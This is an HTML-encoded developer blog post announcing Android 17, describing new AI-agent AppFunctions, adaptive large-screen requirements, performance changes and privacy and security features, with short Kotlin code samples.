    <content type="html">&lt;img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV7zuuXjulHty999mGDWY1kfL8Q9SXjYYWn-7JTpMfVdNP78eb5fW9shOpvVdEqK0WnNp7AhdO0qc7pXAaqcfTwXgOGsfZyqcQv8wyD-9niWBpZuP6ZAPHBSetWenN2lMlRS5wi2d71-n8RCYqrLsFhUCEvM7KeoGLnNaDbiyOZQ0vvyr0O580nXK4Vas/s2048/Metadata%20-%20Static.png" style="display: none;" /&gt;&lt;div&gt;&lt;i&gt;Posted by Matthew McCullough, VP of Product Management, Android Developer&lt;/i&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5KPJZylMSUXRpKFRUd6oM4fNdEoDRdJzdkzg69P_BVUuIDtXqCqTid6hGH40CoHRw7-f50HsT6rISArklGH982MM4K1jKU16SSymes4JPoE4qOZ5s1lLnkbInpUpdJGu5erAYmSgiefzkkOX_ng3AUJKOzzwC1WMTjk2DxLNia8R1C-ErWc7jT4VP8ew/s4209/Blogger%20Hero%20-%20White.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5KPJZylMSUXRpKFRUd6oM4fNdEoDRdJzdkzg69P_BVUuIDtXqCqTid6hGH40CoHRw7-f50HsT6rISArklGH982MM4K1jKU16SSymes4JPoE4qOZ5s1lLnkbInpUpdJGu5erAYmSgiefzkkOX_ng3AUJKOzzwC1WMTjk2DxLNia8R1C-ErWc7jT4VP8ew/s16000/Blogger%20Hero%20-%20White.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Today we're releasing Android 17 and making it available on most supported Pixel devices. Look for new devices running Android 17 in the coming months.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjaHGBWXu3yvdXZ-wYQgN6DjN5TEMRIYDJvQDZTOybRZFWsAMhqhl14b9UZmrlXlEIRDioqRc8m3xRjOnQHJPoICkVpCho4qrmKihPbu_SB7dGVNKwlAaX6eWdjLF4VUdGyzGfxtW0ziFggj63e778VVo38qpMKar4E1wuw0MiPCBvBdrTTXCgI1XD04Q/s1080/AfD-Android-17.gif" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjaHGBWXu3yvdXZ-wYQgN6DjN5TEMRIYDJvQDZTOybRZFWsAMhqhl14b9UZmrlXlEIRDioqRc8m3xRjOnQHJPoICkVpCho4qrmKihPbu_SB7dGVNKwlAaX6eWdjLF4VUdGyzGfxtW0ziFggj63e778VVo38qpMKar4E1wuw0MiPCBvBdrTTXCgI1XD04Q/s320/AfD-Android-17.gif" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;

&lt;p&gt;Android 17 marks the start of our transition to an intelligence system, putting your apps at the center. It's shifting to an adaptive-first development standard by introducing mandatory large-screen resizability, all while delivering next-generation privacy, security, media, camera, and performance. We'll cover all that in this post, as well as how we're bringing together next generation tools, libraries, and agent skills to help your apps embrace the opportunity.&lt;/p&gt;

&lt;p&gt;Throughout the past year, from our Canary channel to our Beta releases, we’ve collaborated with you in the developer community to build a platform you and your users can trust. To that end, this moment marks the availability of the source code at the &lt;a href="https://source.android.com/"&gt;Android Open Source Project&lt;/a&gt; (AOSP). This allows you to &lt;a href="https://cs.android.com/"&gt;examine the source code&lt;/a&gt; for a deeper understanding of how Android works.&lt;/p&gt;

&lt;p&gt;Let's dive deeper into Android 17.&lt;/p&gt;

&lt;h3&gt;An intelligence system&lt;/h3&gt;

&lt;p&gt;With deep integration between hardware, software and AI, we’re transforming Android from an operating system to an intelligence system. It's about delivering new helpful experiences that anticipate user needs, and it brings more opportunities for engagement with your apps. To that end, Android 17 expands the capabilities of AppFunctions, a platform API with a corresponding Jetpack library. It allows you to contribute your app's unique capabilities as orchestratable "tools" for Android MCP, the on-device equivalent of the &lt;a href="https://modelcontextprotocol.io/"&gt;Model Context Protocol&lt;/a&gt;. AI agents and assistants (like Google Gemini) can discover and execute AppFunctions to perform workflows on behalf of the user with direct access to the app's local state.&lt;/p&gt;

&lt;p&gt;The Jetpack library, currently in alpha, makes adding AppFunctions as easy as annotating a class and adding KDoc comments.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;/**
 * A note app's [AppFunction]s.
 */
class NoteFunctions(
    private val noteRepository: NoteRepository
) {
    /**
     * Adds a new note to the app.
     *
     * @param appFunctionContext The execution context.
     * @param title The title of the note.
     * @param content The note's content.
     */
    @AppFunction(isDescribedByKDoc = true)
    suspend fun createNote(
        appFunctionContext: AppFunctionContext,
        title: String,
        content: String
    ): Note {
        return noteRepository.createNote(title, content)
    }
}&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;We’ve also launched an &lt;a href="http://github.com/android/skills/tree/main/on-device/appfunctions"&gt;AppFunctions agent skill&lt;/a&gt; that analyzes your app’s key workflows, automatically generates the required Kotlin code, optimizes your KDocs for LLM tool-calling, and provides ADB commands for testing and debugging.&lt;/p&gt;

&lt;p&gt;The Gemini integration is currently in a private preview with trusted testers, but you can begin preparing your apps now. In addition to ADB commands to execute your AppFunctions, we've provided a &lt;a href="http://github.com/android/appfunctions/releases/initial"&gt;test agent app&lt;/a&gt; that includes an interface to discover and execute your app functions and simulate an AI agent integration. Join our integration early access program at &lt;a href="http://goo.gle/eap-af"&gt;goo.gle/eap-af&lt;/a&gt; for a chance to be among the first apps to deploy AppFunctions to production.&lt;/p&gt;

&lt;h3&gt;Adaptive-first&lt;/h3&gt;
&lt;p&gt;Your users no longer rely on a single form factor; they transition between phones, foldables, tablets, laptops, automotive displays, and immersive XR environments. Now, with over &lt;a href="https://developer.android.com/blog/posts/adaptive-development-for-the-expanding-android-ecosystem"&gt;580 million large screen devices&lt;/a&gt; in the hands of users and the &lt;a href="https://blog.google/products-and-platforms/platforms/android/meet-googlebook/"&gt;forthcoming launch of Googlebooks&lt;/a&gt;, the next generation of ChromeOS built on the Android stack, adaptive is no longer just a technical goal. It’s a massive opportunity to reach highly engaged users, which is one of the reasons we're shifting to an &lt;a href="https://developer.android.com/adaptive-apps"&gt;adaptive-first development standard&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;No resizability/orientation restrictions on large screens&lt;/h2&gt;
&lt;p&gt;To ensure apps deliver a premium experience across all form factors, including mobile devices running in desktop mode on connected displays, Android 17 (API level 37) removes the developer opt-out for orientation and resizability restrictions on &lt;a href="https://developer.android.com/guide/topics/large-screens"&gt;large screen devices&lt;/a&gt; (sw &amp;gt; 600 dp) for apps targeting API level 37. The system will ignore legacy manifest attributes and runtime APIs, including screenOrientation, setRequestedOrientation(), resizeableActivity=false, and aspect ratio constraints (minAspectRatio/maxAspectRatio). Games (based on &lt;a href="https://support.google.com/googleplay/android-developer/answer/9859673?hl=en"&gt;app category&lt;/a&gt; in Google Play) remain exempt. Your app must be ready to adapt to any window size, respect the user's preferred device posture, and support free-form windowing natively.&lt;/p&gt;

&lt;h2&gt;Next-gen multitasking: App Bubbles, Bubble Bar, and desktop interactive PiP&lt;/h2&gt;
&lt;p&gt;Android 17 introduces powerful new windowing capabilities that redefine how users multitask, demanding even greater layout flexibility from your apps:&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;App Bubbles:&lt;/strong&gt; Moving beyond the messaging bubbles API, users can now transform any app into a floating bubble by long-pressing its icon on the launcher. This feature is available across phones, foldables, and tablets, enabling lightweight multitasking for any workflow.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;The Bubble Bar:&lt;/strong&gt; On large screens (tablets and foldables), the system taskbar now includes a dedicated Bubble Bar to organize, transition between, and dock these floating app bubbles.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Desktop interactive PiP:&lt;/strong&gt; In desktop environments, Android 17 introduces interactive Picture-in-Picture (PiP). Unlike traditional PiP windows which are read-only, these pinned windows remain fully interactive while staying always-on-top of other application windows.&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg12FRQ31sUiyMj_ZalamTRI4VyI2tMXYKEoRy6b-u0Het272IDbRhznXot7b8AvFJEX-ubw_-pNxyS5JTKPUTBj1CNXwIYkTE906vembUcHeyGzE4Lb72WRyGNF7dOP_aBssNeCplOjEnKAc3d3hkak81LOpG0g9Hlep0AvC11MjdJ1MkqAp7ViUCu2bw/s1600/Bubbles%20(1).gif" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg12FRQ31sUiyMj_ZalamTRI4VyI2tMXYKEoRy6b-u0Het272IDbRhznXot7b8AvFJEX-ubw_-pNxyS5JTKPUTBj1CNXwIYkTE906vembUcHeyGzE4Lb72WRyGNF7dOP_aBssNeCplOjEnKAc3d3hkak81LOpG0g9Hlep0AvC11MjdJ1MkqAp7ViUCu2bw/s16000/Bubbles%20(1).gif" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p style="text-align: center;"&gt;&lt;i&gt;App Bubbles and Bubble Bar in action&lt;/i&gt;&lt;/p&gt;

&lt;h2&gt;Activity recreation updates&lt;/h2&gt;
&lt;p&gt;To prevent disruptive state loss and stutter, Android 17 updates the default behavior for Activity recreation. The system will no longer restart activities by default for typical configuration changes that do not require a full UI redraw (including &lt;a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_keyboard"&gt;CONFIG_KEYBOARD&lt;/a&gt;, &lt;a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_keyboard_hidden"&gt;CONFIG_KEYBOARD_HIDDEN&lt;/a&gt;, &lt;a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_navigation"&gt;CONFIG_NAVIGATION&lt;/a&gt;, &lt;a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_touchscreen"&gt;CONFIG_TOUCHSCREEN&lt;/a&gt;, and &lt;a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_color_mode"&gt;CONFIG_COLOR_MODE&lt;/a&gt;).&lt;br /&gt;
Instead, running activities will receive these updates via onConfigurationChanged(), enabling smooth transitions. If your application explicitly relies on a full restart to reload resources for these changes, you must now explicitly opt-in using the new &lt;a href="https://developer.android.com/reference/kotlin/android/R.attr#recreateonconfigchanges"&gt;android:recreateOnConfigChanges&lt;/a&gt; manifest attribute.&lt;/p&gt;

&lt;h2&gt;Continue On&lt;/h2&gt;
&lt;p&gt;Android 17 adds Continue On to help users seamlessly transition a task between Android devices. The user sees a suggestion for the most recently opened app from their mobile device in their tablet taskbar, providing a one-tap affordance to launch the app and deep-link where they left off. Continue on can support app-to-web transitions, including falling back to using the web if the app isn't installed.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8K42DCZ0VTYpFhTlEazp9_AthhqYdm786k1NFolZrP7HwXk2QlF7UV1CU7ECK9N-CiHSfSbH_E2_cXwL3zUuesP-shpa1nau5QmVWDOQeErnCMtvZUw_wwAHNewZZ5S3811f0n_FNoX4U9kyptZQONM_eDB1AAHaoFjMFgTCC7G1d0X2iRo1MN8sev0/s1920/Continue%20On.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjc8K42DCZ0VTYpFhTlEazp9_AthhqYdm786k1NFolZrP7HwXk2QlF7UV1CU7ECK9N-CiHSfSbH_E2_cXwL3zUuesP-shpa1nau5QmVWDOQeErnCMtvZUw_wwAHNewZZ5S3811f0n_FNoX4U9kyptZQONM_eDB1AAHaoFjMFgTCC7G1d0X2iRo1MN8sev0/s16000/Continue%20On.png" /&gt;&lt;/a&gt;&lt;i&gt;Handoff Suggestion on a Tablet&lt;/i&gt;&lt;/div&gt;&lt;p style="text-align: left;"&gt;&lt;br /&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;class MyHandoffActivity : Activity() {

    ...

  override fun onCreate(savedInstanceState: Bundle?) {
    super.onCreate(savedInstanceState)
    // Do stuff
    ...
    // Enable handoff
    setHandoffEnabled(true, null)
  }

  // Override and implement onHandoffActivityDataRequested
  override fun onHandoffActivityDataRequested(handoffRequestInfo: HandoffActivityDataRequestInfo) : HandoffActivityData {
    // Create and return handoff data
  }
}&lt;/code&gt;&lt;/pre&gt;

&lt;h2&gt;Go adaptive-first with Jetpack Compose&lt;/h2&gt;
&lt;p&gt;To help you adapt your apps to meet the new Android 17 requirements, we've launched the &lt;a href="https://github.com/android/skills/tree/main/jetpack-compose/adaptive"&gt;Jetpack Compose adaptive skill&lt;/a&gt;. This AI-powered developer workflow helps you implement the best adaptive practices:&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;Adaptive navigation:&lt;/strong&gt; Automatically transition between bottom navigation bars on mobile and edge-anchored navigation rails on large screens using NavigationSuiteScaffold from the Material 3 Adaptive library.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Multi-pane layouts:&lt;/strong&gt; Implement list-detail and supporting pane layouts natively using Navigation 3 Scenes (ListDetailSceneStrategy and SupportingPaneSceneStrategy) instead of fragile fragment transactions.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;FlexBox &amp;amp; Grid APIs:&lt;/strong&gt; Utilize Compose 1.11's dynamic layout components to easily adjust row and column spans on the fly, ensuring your content always fills the space beautifully.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Advanced non-touch input:&lt;/strong&gt; Leverage Compose 1.11's enhanced trackpad and mouse support, including native focus rings and new APIs (like TrackpadInjectionScope and performTrackpadInput) to easily test and deliver a true "laptop-class" experience on Googlebooks and Desktop Mode.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Dynamic window states:&lt;/strong&gt; Leverage Compose's reactive state model to seamlessly adapt your UI when the app transitions from full screen to a floating App Bubble or an interactive Desktop PiP window, ensuring a premium experience even at minimal dimensions.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;Android is Compose-first&lt;/h2&gt;
&lt;p&gt;Compose offers the easiest way to build adaptive apps, and that's just one of the &lt;a href="https://developer.android.com/develop/ui/compose/first#why-compose-first"&gt;many reasons&lt;/a&gt; we believe that all Android UI should be built with Compose. To that end, &lt;a href="https://developer.android.com/develop/ui/compose/first"&gt;Android development is now Compose-first&lt;/a&gt;. All new Android APIs, libraries, tools, and developer guidance will be built exclusively for Jetpack Compose. Legacy View components (in the android.widget package) and View-based Jetpack libraries (like Fragments, RecyclerView, and ViewPager) are now in maintenance mode. They will receive only critical bug fixes, and no new features.&lt;/p&gt;

&lt;blockquote&gt;
    &lt;p&gt;&lt;strong&gt;TIP&lt;/strong&gt;&lt;br /&gt;
    Ready to migrate? Use our AI-driven &lt;a href="https://developer.android.com/develop/ui/compose/migrate/migrate-xml-views-to-jetpack-compose"&gt;XML to Compose Migration Skill&lt;/a&gt; to automatically analyze your legacy View layouts and convert them into highly-adaptive Compose code.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;Performance &amp;amp; efficiency&lt;/h3&gt;
&lt;p&gt;App performance means a smooth user interface, fast app start times, and efficient multitasking; Android 17 has impactful improvements in all of these areas.&lt;/p&gt;

&lt;h2&gt;App memory limits&lt;/h2&gt;
&lt;p&gt;Memory usage is one of the silent foundations of overall performance. When a foreground app or service grows unchecked, memory management spikes CPU and battery utilization and eventually leads to the termination of other well-behaved cached apps and background jobs, ultimately forcing slower cold starts and impaired multitasking.&amp;nbsp;&lt;/p&gt;

&lt;p&gt;Starting in Android 17, the system will enforce strict app memory limits based on a device's total RAM, abruptly terminating offending processes. New things to help you navigate these tighter requirements:&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;&lt;strong&gt;R8 Optimizer:&lt;/strong&gt; The R8 optimizer significantly reduces your app's bytecode memory footprint by shrinking classes, methods, and fields into shorter names, and stripping out unused code and resources. Use R8 in full mode along with the new &lt;a href="https://developer.android.com/topic/performance/app-optimization/r8-configuration-analyzer"&gt;R8 configuration analyzer&lt;/a&gt; to make sure your app is getting the most from R8.&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQePgjeISaotpA-miDPKel-qgAYtepLjMMBaiKZQqTf_iYRTJurn_iAFdC7utLnKRKAh9OhSjF_D83skA2PPg7xts0ORX7aVxBkoax6b9uEPqTlGiY_sh8Xv7U1pr0h4Nm8FLo-h3IJD8FhTJc-gOtpBwyLCnDBUPRJAuaaBjsIOhvUmTXFSna0ykksak/s2048/R8%20Configuration%20Analyzer.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQePgjeISaotpA-miDPKel-qgAYtepLjMMBaiKZQqTf_iYRTJurn_iAFdC7utLnKRKAh9OhSjF_D83skA2PPg7xts0ORX7aVxBkoax6b9uEPqTlGiY_sh8Xv7U1pr0h4Nm8FLo-h3IJD8FhTJc-gOtpBwyLCnDBUPRJAuaaBjsIOhvUmTXFSna0ykksak/s16000/R8%20Configuration%20Analyzer.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;div&gt;&lt;span style="color: #0000ee;"&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="color: #0000ee;"&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;The R8 Configuration Analyzer&lt;/div&gt;&lt;ul&gt;&lt;li&gt;&lt;strong&gt;LeakCanary in Android Studio Panda:&lt;/strong&gt; The profiler now features native LeakCanary integration as a dedicated task, fully integrated with your IDE and source code.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;ApplicationExitInfo:&lt;/strong&gt; If your app is terminated by these limits, getDescription() from ApplicationExitInfo will return "MemoryLimiter:AnonSwap".&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;On-Device Anomaly Detection:&lt;/strong&gt; Part of ProfilingManager, you can leverage trigger-based profiling using TRIGGER_TYPE_ANOMALY to automatically capture heap dumps when the memory limit is reached.&lt;/li&gt;
&lt;/ul&gt;

&lt;pre&gt;&lt;code&gt;val profilingManager = applicationContext
   .getSystemService(ProfilingManager::class.java)

val triggers = ArrayList&amp;lt;ProfilingTrigger&amp;gt;().apply {
  add(ProfilingTrigger.Builder(
    ProfilingTrigger.TRIGGER_TYPE_ANOMALY).build())
}
profilingManager.addProfilingTriggers(triggers)&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;And, we're working to surface more in-field memory metrics to you within Google Play Console.&lt;/p&gt;

&lt;h2&gt;Generational garbage collection&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://developer.android.com/about/versions"&gt;Android 17&lt;/a&gt; introduces more frequent, less resource-intensive young-generation collections to &lt;a href="https://developer.android.com/guide/platform#art"&gt;ART&lt;/a&gt;'s Concurrent Mark-Compact garbage collector (GC). By separating short-lived objects from stable, long-lived ones, the system runs frequent, lightweight "young-generation" sweeps rather than expensive full-heap scans, drastically reducing CPU usage, power drain, and UI stutter. Our testing has shown significant improvements in GC interference with application threads and a reduction in the maximum memory resident set size (RSS). ART improvements are also available to over a billion devices running Android 12 (API level 31) and higher through Google Play System updates.&lt;/p&gt;

&lt;h2&gt;Lock-Free MessageQueue&lt;/h2&gt;
&lt;p&gt;For apps targeting SDK 37 or higher, the core &lt;a href="https://developer.android.com/reference/android/os/MessageQueue"&gt;&lt;b&gt;android.os.MessageQueue&lt;/b&gt;&lt;/a&gt; now implements a lock-free architecture, significantly reducing missed frames, improving app startup time, and radically improving the performance of busy queues in multithreaded scenarios. Note: This can break apps that use reflection on private &lt;a href="https://developer.android.com/reference/android/os/MessageQueue"&gt;&lt;b&gt;MessageQueue&lt;/b&gt;&lt;/a&gt; fields and methods.&amp;nbsp; The &lt;a href="https://developer.android.com/reference/android/os/TestLooperManager#peekWhen()"&gt;&lt;b&gt;peekWhen&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;&lt;a href="https://developer.android.com/reference/android/os/TestLooperManager#poll()"&gt;poll&lt;/a&gt; &lt;/b&gt;APIs have been added to &lt;a href="https://developer.android.com/reference/android/os/TestLooperManager"&gt;&lt;b&gt;TestLooperManager&lt;/b&gt;&lt;/a&gt; for instrumentation testing without relying on &lt;a href="https://developer.android.com/reference/android/os/MessageQueue"&gt;&lt;b&gt;MessageQueue&lt;/b&gt;&lt;/a&gt; internals.&lt;/p&gt;

&lt;h2&gt;Static final fields now truly final&lt;/h2&gt;
&lt;p&gt;Starting from Android 17, apps targeting SDK 37 or higher won’t be able to modify “static final” fields, allowing the runtime to apply performance optimizations more aggressively. An attempt to do so via reflection (or deep reflection) will lead to an IllegalAccessException being thrown. Modifying them via JNI’s &lt;b&gt;&lt;code&gt;SetStatic&amp;lt;Type&amp;gt;Field&lt;/code&gt;&lt;/b&gt; methods family will immediately crash the application.&lt;/p&gt;

&lt;h2&gt;Custom notification view restrictions&lt;/h2&gt;
&lt;p&gt;To reduce memory usage we are further restricting the size of &lt;a href="https://developer.android.com/develop/ui/views/notifications/custom-notification"&gt;custom notification views&lt;/a&gt;. This update closes a loophole that allows apps to bypass existing limits using URIs. This behavior is gated by the target SDK version and takes effect for apps targeting API 37 and higher.&lt;/p&gt;

&lt;h3&gt;Privacy &amp;amp; Security&lt;/h3&gt;
&lt;p&gt;Maintaining user trust is at the heart of the Android ecosystem. Android 17 introduces robust features that protect sensitive data while simplifying user experiences.&lt;/p&gt;

&lt;h2&gt;Privacy-preserving choices&lt;/h2&gt;
&lt;p&gt;Historically, apps required broad, permanent permissions to access information like contacts, precise location and media files. Android 17 continues the shift toward privacy-preserving choices that grant temporary, session-based access only to the data the user explicitly selects:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;strong&gt;System-Level Contact Picker:&lt;/strong&gt; Utilizing &lt;code&gt;ACTION_PICK_CONTACTS&lt;/code&gt;, apps can request temporary access only to specific fields (e.g., email or phone number) chosen by the user, eliminating the need for the broad &lt;code&gt;READ_CONTACTS&lt;/code&gt; permission. It also fully supports work/personal profile separation.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Customizable Photo Picker aspect ratio:&lt;/strong&gt;&amp;nbsp;Using&lt;b&gt;&lt;code&gt;PhotoPickerUiCustomizationParams&lt;/code&gt;&lt;/b&gt;, you can customize the system photo picker to show thumbnails in portrait mode. This is perfect for apps that always display photos and videos in portrait such as video based social media apps.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;System-rendered Location Button:&lt;/strong&gt; A new system-rendered location button that you can embed in your app grants precise location access for the current session only.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;EyeDropper API:&lt;/strong&gt; A new system-level API, &lt;code&gt;ACTION_OPEN_EYE_DROPPER&lt;/code&gt;, allows your app to create a system-powered eyedropper enabling the user to select color from any pixel on the display. This provides a secure, privacy-preserving color-picking experience that eliminates the need for broad, sensitive screen capture or media projection permissions.&lt;/li&gt;
&lt;/ul&gt;

&lt;pre&gt;&lt;code&gt;val eyeDropperLauncher = registerForActivityResult(ActivityResultContracts.StartActivityForResult()) { result -&amp;gt;
   if (result.resultCode == Activity.RESULT_OK) {
       val color = result.data?.getIntExtra(Intent.EXTRA_COLOR, Color.BLACK)
       // Use the picked color in your app
   }
}
fun launchColorPicker() {
   val intent = Intent(Intent.ACTION_OPEN_EYE_DROPPER)
   eyeDropperLauncher.launch(intent)
}&lt;/code&gt;&lt;/pre&gt;

&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8m_oR9WymjE9G26nGUCqdhS9GrBd6FXN3ujWbjq7ECD6OMGhS4xUApWkAWpPpRef7lwLhsRE2jYL9FADoF_FX2eMXD-0hp9JVaCzrDhfU8RYJ9qv-Ds9YIwyQK7yHKidW0oOtX1rpg2pG9x2yNp3UkGJDPqUlHX7hiLb-bvDue67FPZK1O-22SuXbO8I/s1267/Eyedropper%20Tester.webp" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8m_oR9WymjE9G26nGUCqdhS9GrBd6FXN3ujWbjq7ECD6OMGhS4xUApWkAWpPpRef7lwLhsRE2jYL9FADoF_FX2eMXD-0hp9JVaCzrDhfU8RYJ9qv-Ds9YIwyQK7yHKidW0oOtX1rpg2pG9x2yNp3UkGJDPqUlHX7hiLb-bvDue67FPZK1O-22SuXbO8I/w640-h360/Eyedropper%20Tester.webp" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3&gt;&lt;br /&gt;&lt;/h3&gt;&lt;h3 style="text-align: center;"&gt;&lt;span id="docs-internal-guid-0ea8e748-7fff-dc26-5289-d5a9513c6997" style="font-weight: normal;"&gt;&lt;span face="Arial, sans-serif" style="font-size: 11pt; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;"&gt;&lt;i&gt;Picking a color from anywhere on the screen with the system EyeDropper&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h2&gt;Local network access&lt;/h2&gt;
&lt;p&gt;Apps targeting Android 17 now either require the &lt;code&gt;&lt;a href="https://developer.android.com/reference/kotlin/android/Manifest.permission#access_local_network"&gt;ACCESS_LOCAL_NETWORK&lt;/a&gt;&lt;/code&gt; runtime permission or the use of system-mediated, privacy-preserving device pickers for local network communication, such as talking to smart home devices or casting receivers. Because &lt;code&gt;ACCESS_LOCAL_NETWORK&lt;/code&gt;  falls under the existing &lt;code&gt;&lt;a href="https://developer.android.com/reference/android/Manifest.permission_group#NEARBY_DEVICES"&gt;NEARBY_DEVICES&lt;/a&gt;&lt;/code&gt; permission group, users who have already granted other &lt;code&gt;&lt;a href="https://developer.android.com/reference/android/Manifest.permission_group#NEARBY_DEVICES"&gt;NEARBY_DEVICES&lt;/a&gt;&lt;/code&gt; permissions will not be prompted again. &lt;/p&gt;

&lt;h2&gt;SMS OTP protection&lt;/h2&gt;
&lt;p&gt;Android 17 expands SMS one-time-password (OTP) protection by delaying access to SMS messages for three hours:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;WebOTP Format: &lt;a href="https://developer.android.com/about/versions/17/behavior-changes-all#sms-otp-all-apps"&gt;Delayed for all apps that are not the intended recipient (domain mismatch)&lt;/a&gt;.&lt;/li&gt;
  &lt;li&gt;Standard SMS OTP: &lt;a href="https://developer.android.com/about/versions/17/behavior-changes-17#sms-otp-protection"&gt;Delayed for all apps targeting SDK 37+&lt;/a&gt;.&lt;/li&gt;
  &lt;li&gt;Exemptions: Default SMS, assistant, and connected companion apps are exempt. Apps are strongly encouraged to migrate to the &lt;a href="https://developer.android.com/identity/sms-retriever"&gt;SMS Retriever&lt;/a&gt; or &lt;a href="https://developers.google.com/identity/sms-retriever/user-consent/overview"&gt;SMS User Consent APIs&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;Post-Quantum Cryptography (PQC)&lt;/h2&gt;
&lt;p&gt;Android 17 is ready for the next generation of cryptographic security:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Keystore Integration: Supported devices can generate ML-DSA (Module-Lattice-Based Digital Signature Algorithm) keys in secure hardware to produce quantum-safe signatures, exposed via standard JCA APIs.&lt;/li&gt;
  &lt;li&gt;Hybrid APK Signing: Introducing the v3.2 APK Signature Scheme, which combines classical signatures with ML-DSA signatures to secure app delivery.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;Safer native dynamic code loading&amp;nbsp;&lt;/h2&gt;
If your app targets SDK 37 or higher, the Safer Dynamic Code Loading (DCL) protection &lt;a href="https://developer.android.com/about/versions/14/behavior-changes-14#safer-dynamic-code-loading"&gt;introduced in Android 14&lt;/a&gt; for DEX and JAR files now extends to native libraries. All native files loaded using System.load must be marked as read-only. Otherwise, the system throws UnsatisfiedLinkError

&lt;h2&gt;Smarter password protection for physical inputs&lt;/h2&gt;
&lt;p&gt;With Android 17, we're making it safer to enter passwords, PINs, and other secrets when using a physical keyboard by no longer showing the last typed character by default.&lt;/p&gt;
&lt;p&gt;Users can still easily customize these display settings to match their preferences (availability may vary by device manufacturer).&lt;/p&gt;
&lt;p&gt;These enhanced privacy protections are automatically supported byAndroid's built-in SDK components and will be supported in Compose 1.12 for SecureTextFields. &lt;/p&gt;

